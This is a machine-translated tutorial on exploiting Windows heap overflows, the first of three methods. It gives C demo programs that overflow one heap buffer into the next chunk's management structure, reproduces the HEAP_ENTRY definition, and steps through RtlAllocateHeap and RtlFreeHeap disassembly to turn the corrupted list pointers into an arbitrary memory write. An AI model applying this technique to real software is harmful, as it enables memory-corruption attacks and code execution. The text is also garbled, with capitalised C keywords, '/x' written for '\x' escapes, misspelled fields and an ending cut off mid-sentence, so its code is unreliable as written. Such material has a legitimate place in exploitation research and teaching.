Heap Overflow in windows

Summary three methods of using heap overflow in windows (1)

Main (int argc, char * argv [])
{
Char * buf1, * buf2;
Char s [] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/x03/x00/x05/x00/x00/x01/
X08/x00/x11/x11/x11/x11/x21/x21/x21/x21 ";

Buf1 = (char *) malloc (32);/* allocate two memories */
Memcpy (buf1, s, 32 + 16);/* Copy 16 more bytes */

Buf2 = (char *) malloc (16 );

Free (buf1 );
Free (buf2 );

Return 0;
}

After malloc is completed for buf1, the returned address (buf1) is a pointer to the memory allocation.

Buf1 management structure (8 bytes) | buf1 real operable space (32 bytes) | management structure of the next idle heap (8 bytes) | two double-stranded table pointers (8 bytes)

After malloc is completed for buf2, the memory allocated to buf1 is as follows:

Buf1 management structure (8 bytes) | buf1 real operable space (32 bytes) | buf2 management structure (8 bytes) | buf2 real operable space (16 bytes) | two double-stranded table pointers (8 bytes)

Now, if the memcpy operation of buf1 overflows and overwrites
Management structure of the next idle heap (8 bytes) | two double-stranded table pointers (8 bytes)
When there are 16 bytes in total, the rtlallocheap operation of buf2 will be abnormal. The reason is the code of rtlallocheap.

001b: 77fcc453 8901 mov [ECx], eax
001b: 77fcc455 894804 mov [eax + 04], ECx

In this case, ECx points to the next pointer (0x21212121) of two double-stranded table pointers (8 bytes), and eax points to the forward pointer (0x11111111 ). Similar to format string overflow, you can write any data to any address. This situation is relatively simple, provided that buf1 has a chance of overflow before buf2 allocates space.

2. Use rtlfreeheap method 1
This is what ilsy mentioned. Let's look at the example.

Main (INT argc, char * argv [])
{
Char * buf1, * buf2;
Char s [] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/x03/x00/x05/x00/x00/x09 ";

Buf1 = (char *) malloc (32);/* allocate two memories */
Buf2 = (char *) malloc (16 );

Memcpy (buf1, S, 32 + 6);/* Copy 6 more bytes */

Free (buf1 );
Free (buf2 );

Return 0;
}

Because buf1 has 6 more bytes, these 6 bytes will overwrite the management structure of buf2, and an exception will occur in free (buf2. As long as we carefully construct these 6 bytes, we can achieve this goal.

Let's take a look at the definition of the 8-byte management structure (from the Windows source code)
Typedef struct _ HEAP_ENTRY {

//
// This field gives the size of the current block in allocation
// Granularity units. (I. e. Size <HEAP_GRANULARITY_SHIFT
// Equals the size in bytes ).
//
// Wait t if this is part of a virtual alloc block then this
// Value is the difference between the commit size in the virtual
// Alloc entry and what the user asked.
//

USHORT Size;

//
// This field gives the size of the previous block in allocation
// Granularity units. (I. e. previussize <HEAP_GRANULARITY_SHIFT
// Equals the size of the previous block in bytes ).
//

USHORT previussize;

//
// This field contains the index into the segment that controls
// The memory for this block.
//

Uchar segmentindex;

//
// This field contains various flag bits associated with this block.
// Currently these are:
//
// 0x01-heap_entry_busy
// 0x02-heap_entry_extra_present
// 0x04-heap_entry_fill_pattern
// 0x08-heap_entry_virtual_alloc
// 0x10-heap_entry_last_entry
// 0x20-heap_entry_settable_flag1
// 0x40-heap_entry_settable_flag2
// 0x80-heap_entry_settable_flag3
//

Uchar flags;

//
// This field contains the number of unused bytes at the end of this
// Block that were not actually allocated. used to compute exact
// Size requested prior to rounding requested size to allocation
// Granularity. Also used for Tail checking purposes.
//

Uchar unusedbytes;

//
// Small (8 bit) Tag indexes can go here.
//

Uchar smalltagindex;

# If defined (_ win64)
Ulonglong reserved1;
# Endif

} Heap_entry, * pheap_entry;

Yes

Size of the current heap (2 bytes) | size of the previous heap (2 bytes) | index (1 byte) | flag (1 byte) | unusedbytes (1 byte) | smalltagindex (1 byte)

Note that the size here is the actual size of the 8-byte alignment and then divided by the value of 8.
Let's look at the various flags.

Let's take a look at the key points in rtlfreeheap.

Key Aspect 1
001b: 77fcc829 8a4605 mov Al, [ESI + 05] // ESI points to the start address of the buf2 8-byte management structure, namely, the Al flag
001b: 77fcc82c a801 test Al, 01 // whether the flag value contains heap_entry_busy
001b: 77fcc82e 0f84a40e0000 JZ 77fcd6d8 // skip if not included. Skip here
001b: 77fcc834 f6c207 test DL, 07
001B: 77FCC837 0F859B0E0000 JNZ 77FCD6D8
001B: 77FCC83D 807E0440 cmp byte ptr [ESI + 04], 40 // esi + 4 is greater than 0x40
001B: 77FCC841 0F83910E0000 JAE 77FCD6D8 // jump if the value is greater than or equal to, and cannot jump here
001B: 77FCC847 834 dfcff or dword ptr [EBP-04],-01
001B: 77FCC84B A8E0 test al, E0 // flag whether HEAP_ENTRY_SETTABLE_FLAG1 2 3
001B: 77FCC84D 754A JNZ 77FCC899 // skip if one exists. This is not important.
001B: 77FCC84F 8B8F80050000 mov ecx, [EDI + 00000580]
001B: 77FCC855 85C9 test ecx, ECX
001B: 77FCC857 7440 JZ 77FCC899 // jump here

Key Aspect 2
001B: 77FCC899 c745fc0000000 mov dword ptr [EBP-04], 00000001
001B: 77FCC8A0 F6C301 test bl, 01
001B: 77FCC8A3 750F JNZ 77FCC8B4 // jump here
001B: 77FCC8A5 FFB778050000 push dword ptr [EDI + 00000578]
001B: 77FCC8AB E853C8FBFF CALL ntdll! RtlEnterCriticalSection
001b: 77fcc8b0 c645d401 mov byte PTR [EBP-2C], 01
001b: 77fcc8b4 f6460508 test byte PTR [ESI + 05], 08 // flag whether heap_entry_virtual_alloc is included
001b: 77fcc8b8 0f858bf2ffff jnz 77fcbb49 // skip when the content is contained. Skip here

Key Aspect 3
001b: 77fcbb49 83c6e8 add ESI,-18 // ilsy indicates that 0x18 is different in different Windows versions.
001b: 77fcbb4c 89759c mov [EBP-64], ESI
001b: 77fcbb4f 8b06 mov eax, [esi]
001b: 77fcbb51 894598 mov [EBP-68], eax
001b: 77fcbb54 8b7604 mov ESI, [ESI + 04]
001b: 77fcbb57 897594 mov [EBP-6C], ESI
001b: 77fcbb5a 8906 mov [esi], eax // operation exception

We can see that when the last operation is abnormal, eax = 0x61616161, ESI = 0x61616161 is exactly the value in buf1, that is, after copying the data from the start address of buf2 minus the address 0x18